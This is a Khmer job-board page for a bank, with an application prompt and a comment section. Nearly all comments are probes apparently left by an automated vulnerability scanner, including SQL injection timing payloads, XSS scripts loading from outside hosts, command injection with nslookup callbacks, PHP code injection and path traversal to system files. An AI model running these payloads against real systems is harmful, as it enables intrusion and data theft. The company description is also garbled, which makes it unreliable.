ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

ធនាគារ ស្ថាបនា
ម្ចាស់ក្រុមហ៊ុនផ្ទាល់របស់ ធនាគារ ស្ថាបនា ភីអិលស៊ី គឺជាសាជីវកម្ម ម៉ារ៉ូហាន់ របស់ជប៉ុន​ដែល​បាន​​បង្កើត​ឡើង​តាំង​ពីខែឧសភា ឆ្នាំ១៩៧៥ ដោយលោក បណ្ឌិត Han Chang-Woo ប្រធានក្រុមប្រឹក្សាភិបាល​ ហើយបច្ចុប្បន្នគឺ​ជាក្រុមហ៊ុន​ពហុ​កំសាន្ត​ឈានមុខគេក្នុង​​ប្រទេស​ជប៉ុន។

ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 73

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 340 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 09:51:36


  @@Hj0rG


 • pHqghUme

  2021-05-06 09:51:30


  1'"


 • pHqghUme

  2021-05-06 09:51:29


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 09:51:09


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 09:50:50


  rfBc6uVs')) OR 202=(SELECT 202 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:50:27


  UdYfuWA5') OR 984=(SELECT 984 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:50:05


  sieFwSF6' OR 453=(SELECT 453 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:49:45


  -1)) OR 281=(SELECT 281 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:49:30


  -5) OR 666=(SELECT 666 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:49:13


  -5 OR 843=(SELECT 843 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 09:48:51


  oNkCgxpB'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:48:27


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:48:07


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:47:46


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 09:47:27


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 09:47:12


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 09:46:56


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 09:46:43


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 09:46:30


  -1' OR 2+837-837-1=0+0+0+1 or '0F5AHn8G'='


 • pHqghUme

  2021-05-06 09:46:30


  -1" OR 2+609-609-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:46:28


  -1 OR 2+941-941-1=0+0+0+1


 • pHqghUme

  2021-05-06 09:46:28


  -1' OR 2+140-140-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:46:27


  -1 OR 2+284-284-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 09:46:26


  rfWFQtF7


 • pHqghUme

  2021-05-06 09:46:03


  1


 • pHqghUme

  2021-05-06 09:45:44


  1


 • @@iut6B

  2021-05-06 09:45:29


  1


 • 1'"

  2021-05-06 09:45:20


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 09:45:19


  1


 • 8sNOm3L3')) OR 240=(SELECT 240 FROM PG_SLEEP(15))--

  2021-05-06 09:44:55


  1


 • VX2KoAxG') OR 586=(SELECT 586 FROM PG_SLEEP(15))--

  2021-05-06 09:44:31


  1


 • XO5C1Xza' OR 449=(SELECT 449 FROM PG_SLEEP(15))--

  2021-05-06 09:44:03


  1


 • CVJJXirN'; waitfor delay '0:0:15' --

  2021-05-06 09:43:42


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 09:43:21


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 09:42:58


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 09:42:39


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 09:42:16


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 09:41:56


  1


 • -1" OR 2+556-556-1=0+0+0+1 --

  2021-05-06 09:41:40


  1


 • -1' OR 2+822-822-1=0+0+0+1 --

  2021-05-06 09:41:39


  1


 • -1' OR 2+857-857-1=0+0+0+1 or 'bkZx3HQn'='

  2021-05-06 09:41:39


  1


 • -1 OR 2+579-579-1=0+0+0+1 --

  2021-05-06 09:41:38


  1


 • -1 OR 2+304-304-1=0+0+0+1

  2021-05-06 09:41:38


  1


 • JkbIWUCi

  2021-05-06 09:41:37


  1


 • pHqghUme

  2021-05-06 09:41:15


  1


 • pHqghUme

  2021-05-06 09:40:49


  1


 • pHqghUme

  2021-05-06 09:40:28


  1


 • pHqghUme

  2021-05-06 09:40:24


  1


 • pHqghUme

  2021-05-06 09:40:23


  1


 • pHqghUme

  2021-05-06 09:39:56


  1


 • pHqghUme

  2021-05-06 09:39:36


  1


 • pHqghUme

  2021-05-06 09:39:19


  1


 • pHqghUme

  2021-05-06 09:39:03


  1


 • pHqghUme

  2021-05-06 09:38:49


  1


 • pHqghUme

  2021-05-06 09:38:35


  1


 • pHqghUme

  2021-05-06 09:38:20


  1


 • pHqghUme

  2021-05-06 09:38:08


  1


 • pHqghUme

  2021-05-06 09:37:53


  1


 • pHqghUme

  2021-05-06 09:37:36


  1


 • pHqghUme

  2021-05-06 09:37:35


  1


 • pHqghUme

  2021-05-06 09:37:35


  1


 • pHqghUme

  2021-05-06 09:37:34


  1


 • pHqghUme

  2021-05-06 09:37:34


  1


 • pHqghUme

  2021-05-06 09:37:33


  1


 • pHqghUme

  2021-05-06 09:37:18


  1


 • pHqghUme

  2021-05-06 09:36:57


  1


 • pHqghUme

  2021-05-06 09:36:39


  1


 • pHqghUme

  2021-05-06 09:36:36


  1


 • pHqghUme

  2021-05-06 09:36:36


  1


 • pHqghUme

  2021-05-06 09:36:15


  1


 • pHqghUme

  2021-05-06 09:35:44


  1


 • pHqghUme

  2021-05-06 09:35:19


  1


 • pHqghUme

  2021-05-06 09:34:54


  1


 • pHqghUme

  2021-05-06 09:34:31


  1


 • pHqghUme

  2021-05-06 09:34:26


  1<JF9ylg<


 • pHqghUme

  2021-05-06 09:34:19


  1<img sRc='http://attacker-9608/log.php?


 • pHqghUme

  2021-05-06 09:34:13


  1<tNnfOZ x=9291>


 • pHqghUme

  2021-05-06 09:34:11


  1


 • pHqghUme

  2021-05-06 09:34:06


  1<ifRAme sRc=9013.com></IfRamE>


 • pHqghUme

  2021-05-06 09:33:53


  1<WFDRWA>ZUCXE[!+!]</WFDRWA>


 • pHqghUme

  2021-05-06 09:33:42


  1QIQW9 <ScRiPt >76Hm(9830)</ScRiPt>


 • pHqghUme

  2021-05-06 09:33:40


  1


 • pHqghUme

  2021-05-06 09:33:35


  1<% contenteditable onresize=76Hm(9417)>


 • pHqghUme

  2021-05-06 09:33:30


  1}body{acu:Expre/**/SSion(76Hm(9906))}


 • pHqghUme

  2021-05-06 09:33:07


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:33:07


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:32:21


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 09:32:20


  1


 • pHqghUme

  2021-05-06 09:32:15


  1<input autofocus onfocus=76Hm(9012)>


 • pHqghUme

  2021-05-06 09:31:46


  1&lt;ScRiPt&gt;76Hm(9400)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 09:31:46


  1&lt;ScRiPt&gt;76Hm(9400)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 09:31:46


  1


 • pHqghUme

  2021-05-06 09:31:04


  1\u003CScRiPt\76Hm(9585)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 09:30:56


  %31%3C%53%63%52%69%50%74%20%3E%37%36%48%6D%289601%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 09:30:34


  1


 • pHqghUme

  2021-05-06 09:30:32


  1<img/src=">" onerror=alert(9184)>


 • pHqghUme

  2021-05-06 09:30:23


  1<img src=xyz OnErRor=76Hm(9526)>


 • pHqghUme

  2021-05-06 09:30:16


  1


 • pHqghUme

  2021-05-06 09:30:15


  1


 • pHqghUme

  2021-05-06 09:30:15


  1<img src=//xss.bxss.me/t/dot.gif onload=76Hm(9483)>


 • pHqghUme

  2021-05-06 09:30:14


  1


 • pHqghUme

  2021-05-06 09:30:13


  1


 • pHqghUme

  2021-05-06 09:30:13


  1


 • pHqghUme

  2021-05-06 09:30:12


  1


 • pHqghUme

  2021-05-06 09:30:08


  1<body onload=76Hm(9781)>


 • pHqghUme

  2021-05-06 09:30:02


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9527'>


 • pHqghUme

  2021-05-06 09:29:54


  1<isindex type=image src=1 onerror=76Hm(9700)>


 • pHqghUme

  2021-05-06 09:29:47


  1


 • pHqghUme

  2021-05-06 09:29:44


  1<ScRiPt >76Hm(9947)</ScRiPt>


 • pHqghUme

  2021-05-06 09:29:34


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9969></ScRiPt>


 • pHqghUme

  2021-05-06 09:29:23


  1<ScRiPt >76Hm(9450)</ScRiPt>


 • pHqghUme

  2021-05-06 09:29:23


  1


 • pHqghUme

  2021-05-06 09:29:15


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%37%36%48%6D%28%39%34%31%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 09:29:10


  1<script>76Hm(9381)</script>


 • pHqghUme

  2021-05-06 09:29:04


  1<WOQTNB>UVVZN[!+!]</WOQTNB>


 • pHqghUme

  2021-05-06 09:28:56


  1<ScRiPt >76Hm(9419)</ScRiPt>


 • pHqghUme

  2021-05-06 09:28:50


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 09:28:42


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 09:28:32


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 09:28:25


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 09:28:21


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:28:16


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 09:28:11


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:28:01


  acux3112%C0%BEz1%C0%BCz2a%90bcxuca3112


 • pHqghUme

  2021-05-06 09:27:49


  acu4131%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4131


 • pHqghUme

  2021-05-06 09:27:36


  19449724


 • pHqghUme

  2021-05-06 09:27:30


  '"()&%<acx><ScRiPt >76Hm(9967)</ScRiPt>


 • pHqghUme

  2021-05-06 09:27:21


  1'"()&%<acx><ScRiPt >76Hm(9954)</ScRiPt>


 • pHqghUme<wuut83<

  2021-05-06 09:27:10


  1


 • pHqghUme<img sRc='http://attacker-9911/log.php?

  2021-05-06 09:27:03


  1


 • pHqghUme<rkTc8K x=9410>

  2021-05-06 09:26:57


  1


 • pHqghUme<ifRAme sRc=9875.com></IfRamE>

  2021-05-06 09:26:48


  1


 • pHqghUme<WQRUD2>MOCQ8[!+!]</WQRUD2>

  2021-05-06 09:26:40


  1


 • pHqghUmey7yRn <ScRiPt >76Hm(9557)</ScRiPt>

  2021-05-06 09:26:32


  1


 • pHqghUme<% contenteditable onresize=76Hm(9388)>

  2021-05-06 09:26:26


  1


 • pHqghUme}body{acu:Expre/**/SSion(76Hm(9058))}

  2021-05-06 09:26:21


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 09:26:15


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 09:26:08


  1


 • pHqghUme<input autofocus onfocus=76Hm(9239)>

  2021-05-06 09:25:58


  1


 • pHqghUme&lt;ScRiPt&gt;76Hm(9708)&lt;/sCripT&gt;

  2021-05-06 09:25:44


  1


 • pHqghUme\u003CScRiPt\76Hm(9547)\u003C/sCripT\u003E

  2021-05-06 09:25:34


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%37%36%48%6D%289979%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 09:25:27


  1


 • pHqghUme<img/src=">" onerror=alert(9845)>

  2021-05-06 09:25:20


  1


 • pHqghUme<img src=xyz OnErRor=76Hm(9122)>

  2021-05-06 09:25:10


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=76Hm(9543)>

  2021-05-06 09:25:02


  1


 • pHqghUme<body onload=76Hm(9406)>

  2021-05-06 09:24:57


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9468'>

  2021-05-06 09:24:52


  1


 • pHqghUme

  2021-05-06 09:24:48


  1


 • pHqghUme<isindex type=image src=1 onerror=76Hm(9796)>

  2021-05-06 09:24:46


  1


 • pHqghUme<ScRiPt >76Hm(9679)</ScRiPt>

  2021-05-06 09:24:37


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9888></ScRiPt>

  2021-05-06 09:24:30


  1


 • pHqghUme

  2021-05-06 09:24:28


  1


 • pHqghUme<ScRiPt >76Hm(9622)</ScRiPt>

  2021-05-06 09:24:23


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%37%36%48%6D%28%39%39%36%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 09:24:15


  1


 • pHqghUme<script>76Hm(9471)</script>

  2021-05-06 09:24:08


  1


 • pHqghUme<WX9WY4>1XLVX[!+!]</WX9WY4>

  2021-05-06 09:24:02


  1


 • pHqghUme<ScRiPt >76Hm(9400)</ScRiPt>

  2021-05-06 09:23:56


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 09:23:51


  1


 • acx__${98991*97996}__::.x

  2021-05-06 09:23:45


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 09:23:33


  1


 • acx{{98991*97996}}xca

  2021-05-06 09:23:26


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 09:23:19


  1


 • <th:t="${acx}#foreach

  2021-05-06 09:23:12


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 09:23:06


  1


 • acux9148%C0%BEz1%C0%BCz2a%90bcxuca9148

  2021-05-06 09:22:59


  1


 • acu4162%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4162

  2021-05-06 09:22:47


  1


 • pHqghUme9741382

  2021-05-06 09:22:38


  1


 • '"()&%<acx><ScRiPt >76Hm(9643)</ScRiPt>

  2021-05-06 09:22:32


  1


 • pHqghUme'"()&%<acx><ScRiPt >76Hm(9954)</ScRiPt>

  2021-05-06 09:22:26


  1


 • pHqghUme

  2021-05-06 09:22:14


  1


 • pHqghUme

  2021-05-06 09:22:06


  1


 • pHqghUme

  2021-05-06 09:21:58


  1


 • pHqghUme

  2021-05-06 09:21:50


  1


 • pHqghUme

  2021-05-06 09:21:43


  1


 • pHqghUme

  2021-05-06 09:21:40


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 09:21:39


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 09:21:38


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 09:21:36


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 09:21:35


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 09:21:34


  1


 • pHqghUme

  2021-05-06 09:21:33


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • '.print(md5(31337)).'

  2021-05-06 09:21:32


  1


 • ${@print(md5(31337))}\

  2021-05-06 09:21:31


  1


 • pHqghUme

  2021-05-06 09:21:31


  <!--


 • ${@print(md5(31337))}

  2021-05-06 09:21:30


  1


 • pHqghUme

  2021-05-06 09:21:30


  '"


 • ";print(md5(31337));$a="

  2021-05-06 09:21:29


  1


 • ';print(md5(31337));$a='

  2021-05-06 09:21:28


  1


 • <!--

  2021-05-06 09:21:28


  1


 • pHqghUme

  2021-05-06 09:21:28


  `(nslookup hitxzpfzqnevt412b1.bxss.me||perl -e "gethostbyname('hitxzpfzqnevt412b1.bxss.me')")`


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 09:21:27


  1


 • pHqghUme

  2021-05-06 09:21:27


  |(nslookup hitluxzrmreqbc8b48.bxss.me||perl -e "gethostbyname('hitluxzrmreqbc8b48.bxss.me')")


 • '"

  2021-05-06 09:21:27


  1


 • pHqghUme

  2021-05-06 09:21:26


  1


 • pHqghUme

  2021-05-06 09:21:26


  1


 • pHqghUme

  2021-05-06 09:21:25


  1


 • pHqghUme

  2021-05-06 09:21:24


  1


 • pHqghUme

  2021-05-06 09:21:24


  1


 • pHqghUme

  2021-05-06 09:21:23


  1


 • pHqghUme

  2021-05-06 09:21:23


  $(nslookup hitcddgnborsde18c6.bxss.me||perl -e "gethostbyname('hitcddgnborsde18c6.bxss.me')")


 • pHqghUme

  2021-05-06 09:21:23


  1


 • pHqghUme

  2021-05-06 09:21:22


  1&n916218=v963779


 • pHqghUme

  2021-05-06 09:21:20


  bxss.me


 • pHqghUme

  2021-05-06 09:21:20


  (nslookup hitsmmduyvzuc90775.bxss.me||perl -e "gethostbyname('hitsmmduyvzuc90775.bxss.me')")


 • pHqghUme

  2021-05-06 09:21:20


  1


 • pHqghUme

  2021-05-06 09:21:19


  '+'A'.concat(70-3).concat(22*4).concat(109).concat(86).concat(103).concat(86)+(require'socket' Socket.gethostbyname('hitss'+'mmqokwuta337f.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 09:21:19


  |echo usaqrw$()\ kjpkoi\nz^xyu||a #' |echo usaqrw$()\ kjpkoi\nz^xyu||a #|" |echo usaqrw$()\ kjpkoi\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:21:19


  1


 • pHqghUme

  2021-05-06 09:21:19


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 09:21:18


  "+"A".concat(70-3).concat(22*4).concat(102).concat(69).concat(109).concat(83)+(require"socket" Socket.gethostbyname("hitnq"+"rbdqapixd8c08.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 09:21:18


  &echo bnoaoe$()\ bhxuay\nz^xyu||a #' &echo bnoaoe$()\ bhxuay\nz^xyu||a #|" &echo bnoaoe$()\ bhxuay\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:21:18


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 09:21:18


  1


 • pHqghUme

  2021-05-06 09:21:17


  1


 • pHqghUme

  2021-05-06 09:21:16


  echo vupiuj$()\ madoot\nz^xyu||a #' &echo vupiuj$()\ madoot\nz^xyu||a #|" &echo vupiuj$()\ madoot\nz^xyu||a #


 • '+'A'.concat(70-3).concat(22*4).concat(110).concat(81).concat(120).concat(81)+(require'socket' Socket.gethostbyname('hitex'+'sihziipt49e57.bxss.me.')[3].to_s)+'

  2021-05-06 09:21:16


  1


 • pHqghUme

  2021-05-06 09:21:15


  /xfs.bxss.me


 • "+"A".concat(70-3).concat(22*4).concat(122).concat(88).concat(111).concat(84)+(require"socket" Socket.gethostbyname("hitjl"+"pbpqfgjje1e5d.bxss.me.")[3].to_s)+"

  2021-05-06 09:21:15


  1


 • pHqghUme

  2021-05-06 09:21:15


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 09:21:15


  1


 • pHqghUme

  2021-05-06 09:21:15


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 09:21:14


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 09:21:14


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • /xfs.bxss.me

  2021-05-06 09:21:14


  1


 • pHqghUme

  2021-05-06 09:21:14


  1


 • pHqghUme

  2021-05-06 09:21:14


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 09:21:14


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 09:21:14


  1


 • bxss.me

  2021-05-06 09:21:13


  1


 • pHqghUme

  2021-05-06 09:21:12


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 09:21:12


  1


 • pHqghUme

  2021-05-06 09:21:12


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 09:21:11


  1


 • pHqghUme

  2021-05-06 09:21:11


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 09:21:11


  1


 • pHqghUme

  2021-05-06 09:21:11


  1


 • pHqghUme&n938258=v916792

  2021-05-06 09:21:11


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 09:21:11


  1


 • pHqghUme

  2021-05-06 09:21:10


  1


 • pHqghUme

  2021-05-06 09:21:10


  1


 • pHqghUme

  2021-05-06 09:21:10


  1


 • `(nslookup hithgoyxgtnyee505e.bxss.me||perl -e "gethostbyname('hithgoyxgtnyee505e.bxss.me')")`

  2021-05-06 09:21:09


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 09:21:09


  1


 • pHqghUme

  2021-05-06 09:21:09


  1


 • pHqghUme

  2021-05-06 09:21:08


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 09:21:07


  1


 • |(nslookup hitulkswoinci3396d.bxss.me||perl -e "gethostbyname('hitulkswoinci3396d.bxss.me')")

  2021-05-06 09:21:07


  1


 • pHqghUme

  2021-05-06 09:21:07


  1


 • pHqghUme

  2021-05-06 09:21:07


  1


 • pHqghUme

  2021-05-06 09:21:06


  1


 • pHqghUme

  2021-05-06 09:21:05


  1


 • pHqghUme

  2021-05-06 09:21:05


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 09:21:05


  1


 • pHqghUme

  2021-05-06 09:21:04


  1


 • pHqghUme

  2021-05-06 09:21:04


  1


 • pHqghUme

  2021-05-06 09:21:03


  1


 • pHqghUme

  2021-05-06 09:21:03


  '"()


 • $(nslookup hitedmsagwovldb372.bxss.me||perl -e "gethostbyname('hitedmsagwovldb372.bxss.me')")

  2021-05-06 09:21:01


  1


 • pHqghUme

  2021-05-06 09:21:01


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 09:21:00


  1


 • pHqghUme

  2021-05-06 09:21:00


  1


 • (nslookup hitecmbrbvgmv08f69.bxss.me||perl -e "gethostbyname('hitecmbrbvgmv08f69.bxss.me')")

  2021-05-06 09:21:00


  1


 • |echo ggkoql$()\ pivxth\nz^xyu||a #' |echo ggkoql$()\ pivxth\nz^xyu||a #|" |echo ggkoql$()\ pivxth\nz^xyu||a #

  2021-05-06 09:20:59


  1


 • pHqghUme

  2021-05-06 09:20:59


  1


 • pHqghUme

  2021-05-06 09:20:58


  ".gethostbyname(lc("hitmn"."ffonmpxf1a7ee.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(65).chr(100).chr(71)."


 • pHqghUme

  2021-05-06 09:20:57


  1


 • pHqghUme

  2021-05-06 09:20:57


  1


 • '"()

  2021-05-06 09:20:57


  1


 • &echo bekbps$()\ nmfeci\nz^xyu||a #' &echo bekbps$()\ nmfeci\nz^xyu||a #|" &echo bekbps$()\ nmfeci\nz^xyu||a #

  2021-05-06 09:20:56


  1


 • echo vjhudz$()\ lefpdq\nz^xyu||a #' &echo vjhudz$()\ lefpdq\nz^xyu||a #|" &echo vjhudz$()\ lefpdq\nz^xyu||a #

  2021-05-06 09:20:55


  1


 • pHqghUme

  2021-05-06 09:20:55


  '.gethostbyname(lc('hitwj'.'gxtayhfa917b5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(75).chr(97).chr(89).'


 • ".gethostbyname(lc("hitvw"."kwoxewtdad8e7.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(71).chr(109).chr(78)."

  2021-05-06 09:20:54


  1


 • '.gethostbyname(lc('hitxz'.'iczrdrea19b58.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(65).chr(117).chr(68).'

  2021-05-06 09:20:53


  1


 • pHqghUme

  2021-05-06 09:20:52


  1


 • pHqghUme

  2021-05-06 09:20:52


  1


 • pHqghUme

  2021-05-06 09:20:50


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 09:20:49


  1


 • pHqghUme

  2021-05-06 09:20:49


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 09:20:49


  1


 • pHqghUme

  2021-05-06 09:20:49


  1


 • pHqghUme

  2021-05-06 09:20:48


  1


 • pHqghUme

  2021-05-06 09:20:48


  )


 • pHqghUme

  2021-05-06 09:20:48


  1


 • pHqghUme

  2021-05-06 09:20:46


  1


 • !(()&&!|*|*|

  2021-05-06 09:20:45


  1


 • ^(#$!@#$)(()))******

  2021-05-06 09:20:45


  1


 • )

  2021-05-06 09:20:44


  1


 • pHqghUme

  2021-05-06 09:20:43


  1


 • pHqghUme

  2021-05-06 09:20:42


  1


 • pHqghUme

  2021-05-06 09:20:41


  1


 • pHqghUme

  2021-05-06 09:20:41


  1


 • pHqghUme

  2021-05-06 09:20:40


  1


 • pHqghUme

  2021-05-06 09:20:39


  1


 • pHqghUme

  2021-05-06 09:20:37


  1


 • pHqghUme

  2021-05-06 09:20:36


  1


 • pHqghUme

  2021-05-06 09:20:36


  1


 • pHqghUme

  2021-05-06 09:20:36


  ../1


 • pHqghUme

  2021-05-06 09:20:36


  1


 • pHqghUme

  2021-05-06 09:20:35


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 09:20:35


  1


 • pHqghUme

  2021-05-06 09:20:35


  1


 • pHqghUme

  2021-05-06 09:20:35


  1


 • pHqghUme

  2021-05-06 09:20:35


  1


 • pHqghUme

  2021-05-06 09:20:34


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 09:20:34


  1


 • pHqghUme

  2021-05-06 09:20:34


  1


 • ../pHqghUme

  2021-05-06 09:20:33


  1


 • pHqghUme

  2021-05-06 09:20:33


  1


 • pHqghUme

  2021-05-06 09:20:32


  1


 • pHqghUme

  2021-05-06 09:20:32


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 09:20:31


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 09:20:31


  1


 • MlhNWUlqeUo=

  2021-05-06 09:20:30


  1


 • pHqghUme

  2021-05-06 09:20:30


  1


 • pHqghUme

  2021-05-06 09:20:29


  1


 • pHqghUme

  2021-05-06 09:20:29


  1


 • pHqghUme

  2021-05-06 09:20:29


  1


 • pHqghUme

  2021-05-06 09:20:28


  1


 • ${9999420+10000257}

  2021-05-06 09:20:27


  1


 • pHqghUme

  2021-05-06 09:20:27


  1


 • pHqghUme

  2021-05-06 09:20:27


  ${9999007+9999522}


 • pHqghUme

  2021-05-06 09:20:27


  1


 • pHqghUme

  2021-05-06 09:20:26


  1


 • pHqghUme

  2021-05-06 09:20:26


  1


 • pHqghUme

  2021-05-06 09:20:26


  1


 • pHqghUme

  2021-05-06 09:20:26


  1


 • pHqghUme

  2021-05-06 09:20:25


  1


 • pHqghUme

  2021-05-06 09:20:25


  1


 • pHqghUme

  2021-05-06 09:20:24


  1


 • pHqghUme

  2021-05-06 09:20:24


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme

  2021-05-06 09:20:24


  1


 • pHqghUme

  2021-05-06 09:20:24


  1


 • pHqghUme

  2021-05-06 09:20:23


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 09:20:23


  1


 • pHqghUme

  2021-05-06 09:20:23


  1


 • pHqghUme

  2021-05-06 09:20:22


  1


 • pHqghUme

  2021-05-06 09:20:22


  1


 • pHqghUme

  2021-05-06 09:20:21


  1


 • pHqghUme

  2021-05-06 09:20:21


  1


 • pHqghUme

  2021-05-06 09:20:18


  "+response.write(9376896*9816409)+"


 • pHqghUme

  2021-05-06 09:20:18


  1


 • pHqghUme

  2021-05-06 09:20:17


  qkREcsiA


 • pHqghUme

  2021-05-06 09:20:17


  '+response.write(9376896*9816409)+'


 • "+response.write(9281680*9695144)+"

  2021-05-06 09:20:16


  1


 • Vd62zzdK

